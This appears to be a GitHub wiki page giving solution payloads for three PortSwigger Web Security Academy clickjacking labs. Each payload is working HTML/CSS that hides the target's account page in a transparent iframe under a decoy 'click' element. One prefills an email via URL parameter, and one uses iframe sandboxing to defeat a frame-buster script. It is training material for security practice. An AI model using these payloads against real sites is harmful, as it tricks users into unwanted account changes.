Clickjacking - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Basic clickjacking with CSRF token protection

Solution

Payload

<style>
    iframe {
        position:relative;
        width:1000px;
        height:700px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:515px;
        left:60px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://uuid.web-security-academy.net/my-account"></iframe>

Apprentice lab:
Clickjacking with form input data prefilled from a URL parameter

Solution

Payload

<style>
    iframe {
        position:relative;
        width:700px;
        height:500px;
        opacity:0.0001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:450px;
        left:80px;
        z-index: 1;
    }
</style>
<div>click</div>
<iframe src="https://0ad9003504def6cd828decd300f4001f.web-security-academy.net/[email protected]"></iframe>

Apprentice lab:
Clickjacking with a frame buster script

Solution

Payload.

<style>
iframe {
    position:relative;
    width:700px;
    height:500px;
    opacity:0.0001;
    z-index: 2;
}
div {
    position:absolute;
    top:450px;
    left:80px;
    z-index: 1;
}
</style>
<div>click</div>
<iframe sandbox="allow-forms"
src="https://uuid.web-security-academy.net/[email protected]"></iframe>

Note

Always use Chromium for Clickjacking labs!

Clickjacking - gachikuku/portswigger GitHub Wiki

Apprentice lab:Basic clickjacking with CSRF token protection

Apprentice lab:Clickjacking with form input data prefilled from a URL parameter

Apprentice lab:Clickjacking with a frame buster script

⚠️ **GitHub.com Fallback** ⚠️

Apprentice lab:
Basic clickjacking with CSRF token protection

Apprentice lab:
Clickjacking with form input data prefilled from a URL parameter

Apprentice lab:
Clickjacking with a frame buster script

⚠️ GitHub.com Fallback ⚠️